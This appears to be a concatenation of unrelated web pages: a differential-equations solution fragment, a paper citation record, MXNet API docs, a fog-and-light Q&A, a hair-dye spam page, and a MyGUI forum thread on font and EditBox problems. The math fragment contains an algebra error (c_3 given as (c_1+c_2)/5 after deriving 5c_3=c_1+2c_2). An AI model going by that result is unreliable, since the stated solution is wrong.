So if we put these into $E_2$ we get...
$-c_1\sin(t)+c_2\cos(t)-e^{-t}-(-c_3\sin(t)+c_4\cos(t)-2c_5e^{-2t}-2e^{-t})-2(c_3\cos(t) +$
$c_4\sin(t) + c_5e^{-2t} + 2e^{-t})=-3e^{-t}$
$(-c_1+c_3-2c_4)\sin(t)+(c_2-c_4-2c_3)\cos(t)=0$
Now we have
$-c_1+c_3-2c_4=0 \\\ c_2-c_4-2c_3=0$
We need to solve these for $c_3,c_4$
To get $c_3$ so we want to eliminate $c_4$ so we multiply the 2nd by -2 and add it to the first to get
$-2(c_2-c_4-2c_3)-c_1+c_3-2c_4=0 \iff -c_1-2c_2+5c_3=0$
$5c_3=c_1+2c_2 \iff c_3=\frac{c_1+c_2}{5}$
Now we need to find $c_4$ so we want to dliminate $c_3$ so now we multiply the first by 2 and add it to the 2nd
$2(-c_1+c_3-2c_4)+c_2-c_4-2c_3=0 \iff -2c_1+c_2-5c_4=0$
$c_4=\frac{-2c_1+c_2}{5}$
Now we finally can get the final solution
$x_1 = c_1\cos (t) + c_2\sin (t) + e^{-t}$
$x_2 = \frac{c_1+c_2}{5}\cos(t) + \frac{-2c_1+c_2}{5}\sin(t) + c_5e^{-2t} + 2e^{-t}$
The answers are equivalent if you replace $c_1=5k_1 \\\ c_2=5k_2$ in both equations you will get the same answer.
Good luck.
|
|
Preprint Open Access
# Modelling Particle Mass and Particle Number Emissions during the Active Regeneration of Diesel Particulate Filters
Chung Ting Laoa; Jethro Akroyda; Nickolas Eavesa; Alastair Smith; Neal Morgan; Amit Bhave; Markus Krafta
### Citation Style Language JSON Export
{
"publisher": "Zenodo",
"DOI": "10.5281/zenodo.2609189",
"language": "eng",
"title": "Modelling Particle Mass and Particle Number Emissions during the Active Regeneration of Diesel Particulate Filters",
"issued": {
"date-parts": [
[
2019,
3,
26
]
]
},
"abstract": "<p>A new model has been developed to describe the size-dependent effects that are responsible for transient particle mass (PM) and particle number (PN) emissions observed during experiments of the active regeneration of Diesel Particulate Filters (DPFs). The model uses a population balance approach to describe the size of the particles entering and leaving the DPF, and accumulated within it. The population balance is coupled to a unit collector model that describes the filtration of the particles in the porous walls of the DPF and a reactor network model that is used to describe the geometry of the DPF. Two versions of the unit collector model were investigated. The original version, based on current literature, and an extended version, developed in this work, that includes terms to describe both the non-uniform regeneration of the cake and thermal expansion of the pores in the DPF. Simulations using the original unit collector model were able to provide a good description of the pressure drop and PM filtration efficiency during the loading of the DPF, but were unable to adequately describe the change in filtration efficiency during regeneration of the DPF. The introduction of the extended unit collector description enabled the model to describe both the timing of particle breakthrough and the final steady filtration efficiency of the hot regenerated DPF. Further work is required to understand better the transient behaviour of the system. In particular, we stress the importance that future experiments fully characterise the particle size distribution at both the inlet and outlet of the DPF.</p>",
"author": [
{
"family": "Chung Ting Laoa"
},
{
"family": "Jethro Akroyda"
},
{
"family": "Nickolas Eavesa"
},
{
"family": "Alastair Smith"
},
{
"family": "Neal Morgan"
},
{
"family": "Amit Bhave"
},
{
"family": "Markus Krafta"
}
],
"type": "article",
"id": "2609189"
}
85
112
views
|
|
# mxnet.ndarray.linalg.syevd¶
mxnet.ndarray.linalg.syevd(A=None, out=None, name=None, **kwargs)
Eigendecomposition for symmetric matrix. Input is a tensor A of dimension n >= 2.
If n=2, A must be symmetric, of shape (x, x). We compute the eigendecomposition, resulting in the orthonormal matrix U of eigenvectors, shape (x, x), and the vector L of eigenvalues, shape (x,), so that:
U * A = diag(L) * U
Here:
U * UT = UT * U = I
where I is the identity matrix. Also, L(0) <= L(1) <= L(2) <= … (ascending order).
If n>2, syevd is performed separately on the trailing two dimensions of A (batch mode). In this case, U has n dimensions like A, and L has n-1 dimensions.
Note
The operator supports float32 and float64 data types only.
Note
Derivatives for this operator are defined only if A is such that all its eigenvalues are distinct, and the eigengaps are not too small. If you need gradients, do not apply this operator to matrices with multiple eigenvalues.
Examples:
// Single symmetric eigendecomposition
A = [[1., 2.], [2., 4.]]
U, L = syevd(A)
U = [[0.89442719, -0.4472136],
[0.4472136, 0.89442719]]
L = [0., 5.]
// Batch symmetric eigendecomposition
A = [[[1., 2.], [2., 4.]],
[[1., 2.], [2., 5.]]]
U, L = syevd(A)
U = [[[0.89442719, -0.4472136],
[0.4472136, 0.89442719]],
[[0.92387953, -0.38268343],
[0.38268343, 0.92387953]]]
L = [[0., 5.],
[0.17157288, 5.82842712]]
Defined in src/operator/tensor/la_op.cc:L638
Parameters
• A (NDArray) – Tensor of input matrices to be factorized
• out (NDArray, optional) – The output NDArray to hold the result.
Returns
out – The output of this function.
Return type
NDArray or list of NDArrays
|
|
# What spectrum of light does penetrate fog?
I am wondering about what spectrum of light does penetrate fog the best. I would like to know if IR light penetrate fog better than UV light and why is that. Thank you for answers.
• A good guide is that the scattering intensity is $\sim 1/\lambda^4$, ($\lambda$ is wavelength) but there are different regimes depending in the size of the scattering particles vs the wavelength. On this basis ir has lower scattering than UV. – porphyrin Feb 19 at 18:01
• And continuing to longer wavelengths, there is terahertz radiation, for body scanning in airports, etc., and, of course, radar! Without radar, we would know very little of the surface of Venus, which, to put it mildly, is heavily fogged in! – Ed V Feb 20 at 1:10
• This is more of a physics question than a chemistry one. So, you should try physics.SE. – Nilay Ghosh Feb 20 at 4:41
|
|
# The 14 Common Stereotypes When It Comes To Long Lasting Red Hair Dye | Long Lasting Red Hair Dye
The 14 Common Stereotypes When It Comes To Long Lasting Red Hair Dye | Long Lasting Red Hair Dye – long lasting red hair dye
| Welcome to our web page On this ache you can find a lot of very interesting images Our image collection can add to your inspiration about long lasting red hair dye
. You can search for loads of things that you need by looking at the collections we have. Make sure you get inspiration from the content material that we present.
Image Source: ssl-images-amazon.com
Image Source: ssl-images-amazon.com
Image Source: ebayimg.com
Image Source: stackpathdns.com
Image Source: haircrazy.com
Image Source: netdna-ssl.com
Image Source: last-trend.com
Image Source: hearstapps.com
Image Source: matrix.com
Image Source: ytimg.com
Image Source: matrix.com
Image Source: womenoly.com
Image Source: pinimg.com
Image Source: ssl-images-amazon.com
|
|
textbox multiline
nevarim
04-04-2012 13:53:30
hi all
there is possibility to make a textbox multiline without scrollbar:
i want to write 2 line in a editbox with align center
thanks of all
Nevarim
Altren
05-04-2012 10:44:54
Enable multiline. And if your text fits into EditBox you won't see scrolls. If it doesn't fit you can manually disable scroll visibility (VisibleVScroll and VisibleHScroll properties).
Edit: actually default EditBox skin don't have scrolls, so you don't need to do anything special.
nevarim
05-04-2012 12:44:05
in layouteditor i don't find multiline property
Altren
05-04-2012 13:17:11
Ah, you should use EditBox widget and enable ReadOnly mode, since TextBox support only simple single line texts.
nevarim
05-04-2012 14:07:43
really thanks
it goes well
nevarim
05-04-2012 23:37:44
in the editbox i'm trying to put in a text (2000 character) but application goes in crash, it is impossible to put in a text in editbox?
thanks
Nevarim
nevarim
11-04-2012 17:06:12
any hint on this problem?
editbox crash when i try to put in a text long (a description)
thanks
Nevarim
Altren
12-04-2012 09:14:00
Try to debug your application. Or do something to let me reproduce this, because too lont texts are cropped, but doesn't crash. I failed to reproduce your problem and can't find the reason.
nevarim
12-04-2012 18:02:33
maybe i found problem, it seems that when i charge on editbox letters as à ò è ù ì it crashes, it seems that is a problem on Ogre::String
do you have hint?
nevarim
12-04-2012 18:19:34
Unhandled exception in a 0x761cb9bc bloodcolony.exe: Microsoft C + + Exception: MyGUI :: :: UString invalid_data memory location 0x003bce38 ..
nevarim
12-04-2012 18:35:46
maybe i found real problem, its is a font problem
viewtopic.php?f=17&t=11629
but i don't understand how can i solve, i tried to add arial.ttf in core_font and it seems that it doesn't use in it accented letters, but arial include them.....
i use this code
``` <Resource type="ResourceTrueTypeFont" name="Arial"> <Property key="Source" value="arial.ttf"/> <Property key="Size" value="19"/> <Property key="Resolution" value="50"/> <Property key="Antialias" value="false"/> <Property key="SpaceWidth" value="4"/> <Property key="TabWidth" value="8"/> <Property key="CursorWidth" value="2"/> <Property key="Distance" value="6"/> <Property key="OffsetHeight" value="0"/> </Resource> ```
and include arial.ttf in folder
Altren
12-04-2012 20:04:28
I guess the problem is that you are trying to add non-UTF8 string. With characters not defined in font MyGUI replace them with special glyph of not defined character (usually looks like an empty square). I'll try to figure why it is not converted properly.
nevarim
12-04-2012 21:43:08
thanks
i tried to add font arial and in fontviewer i see accented char as square :S with all fonts charged inside windows
nevarim
17-04-2012 04:05:29
tried also with personalized font but nothing to do, all accented chars aren'r reconoscized
Altren
17-04-2012 10:50:20
I just opened font viewer with default font (DejaVuSans.tff) and clicked generate and then pasted "à ò è ù ì" in edit box and I see characters instead of squares.
Remember, that default font doesn't include these characters and you won't see them, until you'll click generate in font viewer.
Edit: also tried with arial.ttf from my os (windows 7) ant it works fine as well.
nevarim
17-04-2012 20:24:38
i tried again
directly in layouteditor using my layout i write in editbox accented letter in caption property with font arial and i have square in property box and rght accented letter in editbox
but in the program having layout charged i have same problem (mygui string not properly charged)
those are files used
core_font
```<?xml version="1.0" encoding="UTF-8"?> <MyGUI type="Resource" version="1.1"> <Resource type="ResourceTrueTypeFont" name="DejaVuSansFont.15"> <Property key="Source" value="DejaVuSans.ttf"/> <Property key="Size" value="10"/> <Codes> <Code range="32 126"/> <Code range="1025 1105"/> <Code range="8470"/> <Code hide="1026 1039"/> <Code hide="1104"/> </Codes> </Resource> <Resource type="ResourceTrueTypeFont" name="Arial"> <Property key="Source" value="arial.ttf"/> <Property key="Size" value="10"/> </Resource> <Resource type="ResourceTrueTypeFont" name="BlackForest"> <Property key="Source" value="blackforest.ttf"/> <Property key="Size" value="10"/> </Resource> </MyGUI> ```
layout
```<?xml version="1.0" encoding="UTF-8"?> <MyGUI type="Layout" version="3.2.0"> <Widget type="ImageBox" skin="ImageBox" position="0 0 1440 900" layer="Back" name="CRRBG"> <Property key="Texture" value="ifc_cr_race.png"/> <Property key="ImageTexture" value="ifc_cr_race.png"/> <Widget type="Button" skin="Button" position="40 32 208 56" name="CRRBGUM"> <Property key="Caption" value="Umano"/> <UserString key="DBINDEX" value="1"/> </Widget> <Widget type="Button" skin="Button" position="40 104 208 56" name="CRRBGNA"> <Property key="Caption" value="Nano"/> <UserString key="DBINDEX" value="2"/> </Widget> <Widget type="Button" skin="Button" position="40 176 208 56" name="CRRBGEL"> <Property key="Caption" value="Elfo"/> <UserString key="DBINDEX" value="3"/> </Widget> <Widget type="Button" skin="Button" position="40 248 208 56" name="CRRBGHA"> <Property key="Caption" value="Halfling"/> <UserString key="DBINDEX" value="8"/> </Widget> <Widget type="Button" skin="Button" position="1180 32 208 56" name="CRRBGMO"> <Property key="Caption" value="Mezzorco"/> <UserString key="DBINDEX" value="9"/> </Widget> <Widget type="Button" skin="Button" position="1180 104 208 56" name="CRRBGMD"> <Property key="Caption" value="Stirpe Demoniaca"/> <UserString key="DBINDEX" value="6"/> </Widget> <Widget type="Button" skin="Button" position="1180 176 208 56" name="CRRBGMA"> <Property key="Caption" value="Stirpe Angelica"/> <UserString key="DBINDEX" value="5"/> </Widget> <Widget type="Button" skin="Button" position="1180 248 208 56" name="CRRBGME"> <Property key="Caption" value="Mezz'elfo"/> <UserString key="DBINDEX" value="4"/> </Widget> <Widget type="Button" skin="Button" position="40 320 208 56" name="CRRBGGN"> <Property key="Caption" value="Gnomo"/> <UserString key="DBINDEX" value="7"/> </Widget> <Widget type="ImageBox" skin="ImageBox" position="736 32 352 552" name="CRRBGIM"/> <Widget type="Button" skin="Button" position="1185 800 104 72" name="CRRBGES"/> <Widget type="Button" skin="Button" position="1295 800 104 72" name="CRRBGAV"/> <Widget type="EditBox" skin="EditBox" position="320 32 352 552" name="CRRBGD"> <Property key="MultiLine" value="true"/> <Property key="ReadOnly" value="true"/> <Property key="WordWrap" value="true"/> <Property key="TextAlign" value="Left Top"/> <Property key="FontName" value="Arial"/> <Property key="Caption" value="òàùòàùòàù"/> </Widget> <Widget type="TextBox" skin="TextBox" position="1185 775 210 20" name="CRRBGRC"/> </Widget> </MyGUI> ```
what is error?
thanks
Nevarim
Altren
18-04-2012 00:21:53
Just tried to use your layout in application with given font definition - everything works fine and I see this characters.
What about squares in layout editor - they appear, because default DejaVuSans with fixed code ranges is used, so this is expected behaviour.
Do you actually see other characters in that edit box? May be there's something wrong with your resources and that font is not generated at all. Also show your log.
Also check, may be you have one font definition, but some other file is actually loaded...
nevarim
18-04-2012 08:27:59
in that editbox i see all normal font what do you mean about resources?
this evening i have to attach also log file
Nevarim
nevarim
18-04-2012 20:03:09
```21:37:21 | Platform | Info | * Initialise: RenderManager | G:\development\MyGUI\source\Platforms\Ogre\OgrePlatform\src\MyGUI_OgreRenderManager.cpp | 43 21:37:21 | Platform | Info | RenderManager successfully initialized | G:\development\MyGUI\source\Platforms\Ogre\OgrePlatform\src\MyGUI_OgreRenderManager.cpp | 71 21:37:21 | Platform | Info | * Initialise: DataManager | G:\development\MyGUI\source\Platforms\Ogre\OgrePlatform\src\MyGUI_OgreDataManager.cpp | 27 21:37:21 | Platform | Info | DataManager successfully initialized | G:\development\MyGUI\source\Platforms\Ogre\OgrePlatform\src\MyGUI_OgreDataManager.cpp | 35 21:37:21 | Core | Info | * Initialise: Gui | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_Gui.cpp | 75 21:37:21 | Core | Info | * MyGUI version 3.2.0 | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_Gui.cpp | 87 21:37:21 | Core | Info | * Initialise: ResourceManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 48 21:37:21 | Core | Info | ResourceManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 56 21:37:21 | Core | Info | * Initialise: LayerManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_LayerManager.cpp | 49 21:37:21 | Core | Info | LayerManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_LayerManager.cpp | 57 21:37:21 | Core | Info | * Initialise: WidgetManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_WidgetManager.cpp | 67 21:37:21 | Core | Info | WidgetManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_WidgetManager.cpp | 98 21:37:21 | Core | Info | * Initialise: InputManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_InputManager.cpp | 58 21:37:21 | Core | Info | InputManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_InputManager.cpp | 78 21:37:21 | Core | Info | * Initialise: SubWidgetManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_SubWidgetManager.cpp | 49 21:37:21 | Core | Info | SubWidgetManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_SubWidgetManager.cpp | 69 21:37:21 | Core | Info | * Initialise: SkinManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_SkinManager.cpp | 53 21:37:21 | Core | Info | SkinManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_SkinManager.cpp | 61 21:37:21 | Core | Info | * Initialise: FontManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_FontManager.cpp | 48 21:37:21 | Core | Info | FontManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_FontManager.cpp | 57 21:37:21 | Core | Info | * Initialise: ControllerManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ControllerManager.cpp | 46 21:37:21 | Core | Info | ControllerManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ControllerManager.cpp | 56 21:37:21 | Core | Info | * Initialise: PointerManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_PointerManager.cpp | 60 21:37:21 | Core | Info | PointerManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_PointerManager.cpp | 78 21:37:21 | Core | Info | * Initialise: ClipboardManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ClipboardManager.cpp | 87 21:37:21 | Core | Info | ClipboardManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ClipboardManager.cpp | 101 21:37:21 | Core | Info | * Initialise: LayoutManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_LayoutManager.cpp | 45 21:37:21 | Core | Info | LayoutManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_LayoutManager.cpp | 50 21:37:21 | Core | Info | * Initialise: DynLibManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_DynLibManager.cpp | 41 21:37:21 | Core | Info | DynLibManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_DynLibManager.cpp | 45 21:37:21 | Core | Info | * Initialise: PluginManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_PluginManager.cpp | 45 21:37:21 | Core | Info | PluginManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_PluginManager.cpp | 49 21:37:21 | Core | Info | * Initialise: LanguageManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_LanguageManager.cpp | 45 21:37:21 | Core | Info | LanguageManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_LanguageManager.cpp | 49 21:37:21 | Core | Info | * Initialise: FactoryManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_FactoryManager.cpp | 40 21:37:21 | Core | Info | FactoryManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_FactoryManager.cpp | 42 21:37:21 | Core | Info | * Initialise: ToolTipManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ToolTipManager.cpp | 48 21:37:21 | Core | Info | ToolTipManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ToolTipManager.cpp | 60 21:37:21 | Core | Info | Load ini file 'MyGUI_Fonts.xml' | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 130 21:37:21 | Core | Info | ResourceTrueTypeFont: Font 'DejaVuSansFont.15' using texture size 128 x 256. | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceTrueTypeFont.cpp | 674 21:37:21 | Core | Info | ResourceTrueTypeFont: Font 'DejaVuSansFont.15' using real height 17 pixels. | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceTrueTypeFont.cpp | 675 21:37:21 | Platform | Warning | Cannot locate resource arial.ttf in resource group General or any other group. | G:\development\MyGUI\source\Platforms\Ogre\OgrePlatform\src\MyGUI_OgreDataManager.cpp | 59 21:37:21 | Core | Error | ResourceTrueTypeFont: Could not load the font 'Arial'! | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceTrueTypeFont.cpp | 449 21:37:21 | Core | Info | ResourceTrueTypeFont: Font 'BlackForest' using texture size 128 x 128. | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceTrueTypeFont.cpp | 674 21:37:21 | Core | Info | ResourceTrueTypeFont: Font 'BlackForest' using real height 14 pixels. | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceTrueTypeFont.cpp | 675 21:37:21 | Core | Info | Load ini file 'MyGUI_Images.xml' | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 130 21:37:21 | Core | Info | Load ini file 'MyGUI_CommonSkins.xml' | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 130 21:37:21 | Core | Info | Register value : 'HCenter' = 0 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 238 21:37:21 | Core | Info | Register value : 'VCenter' = 0 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 239 21:37:21 | Core | Info | Register value : 'Center' = 0 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 240 21:37:21 | Core | Info | Register value : 'Left' = 2 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 241 21:37:21 | Core | Info | Register value : 'Right' = 4 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 242 21:37:21 | Core | Info | Register value : 'HStretch' = 6 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 243 21:37:21 | Core | Info | Register value : 'Top' = 8 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 244 21:37:21 | Core | Info | Register value : 'Bottom' = 16 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 245 21:37:21 | Core | Info | Register value : 'VStretch' = 24 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 246 21:37:21 | Core | Info | Register value : 'Stretch' = 30 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 247 21:37:21 | Core | Info | Register value : 'Default' = 10 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 248 21:37:21 | Core | Info | Load ini file 'MyGUI_BlueWhiteTheme.xml' | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 130 21:37:21 | Core | Info | Load ini file 'MyGUI_BlueWhiteImages.xml' | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 130 21:37:21 | Core | Info | Load ini file 'MyGUI_BlueWhiteSkins.xml' | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 130 21:37:22 | Core | Info | Load ini file 'MyGUI_BlueWhiteTemplates.xml' | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 130 21:37:22 | Core | Info | Load ini file 'MyGUI_Pointers.xml' | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 130 21:37:22 | Core | Info | Load ini file 'MyGUI_Layers.xml' | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 130 21:37:22 | Core | Info | Load ini file 'MyGUI_Settings.xml' | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 130 21:37:22 | Core | Info | Gui successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_Gui.cpp | 133 21:37:22 | Core | Warning | Widget property 'Texture' not found [ifc_login.layout] | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_Widget.cpp | 1178 21:37:22 | Core | Warning | Texture 'ifc_login.png' have non power of two size | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_TextureUtility.cpp | 76 21:37:26 | Core | Warning | Widget property 'Texture' not found [ifc_main.layout] | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_Widget.cpp | 1178 21:37:27 | Core | Warning | Texture 'ifc_main.png' have non power of two size | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_TextureUtility.cpp | 76 21:37:28 | Core | Warning | Widget property 'Texture' not found [ifc_cr_race.layout] | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_Widget.cpp | 1178 21:37:28 | Core | Warning | Texture 'ifc_cr_race.png' have non power of two size | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_TextureUtility.cpp | 76 ```
Altren
19-04-2012 19:14:19
```21:37:21 | Platform | Warning | Cannot locate resource arial.ttf in resource group General or any other group. | G:\development\MyGUI\source\Platforms\Ogre\OgrePlatform\src\MyGUI_OgreDataManager.cpp | 59 21:37:21 | Core | Error | ResourceTrueTypeFont: Could not load the font 'Arial'! | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceTrueTypeFont.cpp | 449```So, looks like that font is not in one of your resource folders and font not loaded at all.
nevarim
25-04-2012 17:29:57
hi altren i have again a problem with font, following error i set correctly font in right folder, now i have same problem with these logs
```18:23:57 | Platform | Info | * Initialise: RenderManager | G:\development\MyGUI\source\Platforms\Ogre\OgrePlatform\src\MyGUI_OgreRenderManager.cpp | 43 18:23:57 | Platform | Info | RenderManager successfully initialized | G:\development\MyGUI\source\Platforms\Ogre\OgrePlatform\src\MyGUI_OgreRenderManager.cpp | 71 18:23:57 | Platform | Info | * Initialise: DataManager | G:\development\MyGUI\source\Platforms\Ogre\OgrePlatform\src\MyGUI_OgreDataManager.cpp | 27 18:23:57 | Platform | Info | DataManager successfully initialized | G:\development\MyGUI\source\Platforms\Ogre\OgrePlatform\src\MyGUI_OgreDataManager.cpp | 35 18:23:57 | Core | Info | * Initialise: Gui | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_Gui.cpp | 75 18:23:57 | Core | Info | * MyGUI version 3.2.0 | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_Gui.cpp | 87 18:23:57 | Core | Info | * Initialise: ResourceManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 48 18:23:57 | Core | Info | ResourceManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 56 18:23:57 | Core | Info | * Initialise: LayerManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_LayerManager.cpp | 49 18:23:57 | Core | Info | LayerManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_LayerManager.cpp | 57 18:23:57 | Core | Info | * Initialise: WidgetManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_WidgetManager.cpp | 67 18:23:57 | Core | Info | WidgetManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_WidgetManager.cpp | 98 18:23:57 | Core | Info | * Initialise: InputManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_InputManager.cpp | 58 18:23:57 | Core | Info | InputManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_InputManager.cpp | 78 18:23:57 | Core | Info | * Initialise: SubWidgetManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_SubWidgetManager.cpp | 49 18:23:57 | Core | Info | SubWidgetManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_SubWidgetManager.cpp | 69 18:23:57 | Core | Info | * Initialise: SkinManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_SkinManager.cpp | 53 18:23:57 | Core | Info | SkinManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_SkinManager.cpp | 61 18:23:57 | Core | Info | * Initialise: FontManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_FontManager.cpp | 48 18:23:57 | Core | Info | FontManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_FontManager.cpp | 57 18:23:57 | Core | Info | * Initialise: ControllerManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ControllerManager.cpp | 46 18:23:57 | Core | Info | ControllerManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ControllerManager.cpp | 56 18:23:57 | Core | Info | * Initialise: PointerManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_PointerManager.cpp | 60 18:23:57 | Core | Info | PointerManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_PointerManager.cpp | 78 18:23:57 | Core | Info | * Initialise: ClipboardManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ClipboardManager.cpp | 87 18:23:57 | Core | Info | ClipboardManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ClipboardManager.cpp | 101 18:23:57 | Core | Info | * Initialise: LayoutManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_LayoutManager.cpp | 45 18:23:57 | Core | Info | LayoutManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_LayoutManager.cpp | 50 18:23:57 | Core | Info | * Initialise: DynLibManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_DynLibManager.cpp | 41 18:23:57 | Core | Info | DynLibManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_DynLibManager.cpp | 45 18:23:57 | Core | Info | * Initialise: PluginManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_PluginManager.cpp | 45 18:23:57 | Core | Info | PluginManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_PluginManager.cpp | 49 18:23:57 | Core | Info | * Initialise: LanguageManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_LanguageManager.cpp | 45 18:23:57 | Core | Info | LanguageManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_LanguageManager.cpp | 49 18:23:57 | Core | Info | * Initialise: FactoryManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_FactoryManager.cpp | 40 18:23:57 | Core | Info | FactoryManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_FactoryManager.cpp | 42 18:23:57 | Core | Info | * Initialise: ToolTipManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ToolTipManager.cpp | 48 18:23:57 | Core | Info | ToolTipManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ToolTipManager.cpp | 60 18:23:57 | Core | Info | Load ini file 'MyGUI_Fonts.xml' | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 130 18:23:57 | Core | Info | ResourceTrueTypeFont: Font 'DejaVuSansFont.15' using texture size 128 x 256. | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceTrueTypeFont.cpp | 674 18:23:57 | Core | Info | ResourceTrueTypeFont: Font 'DejaVuSansFont.15' using real height 17 pixels. | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceTrueTypeFont.cpp | 675 18:24:02 | Core | Info | ResourceTrueTypeFont: Font 'Arial' using texture size 512 x 512. | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceTrueTypeFont.cpp | 674 18:24:02 | Core | Info | ResourceTrueTypeFont: Font 'Arial' using real height 16 pixels. | 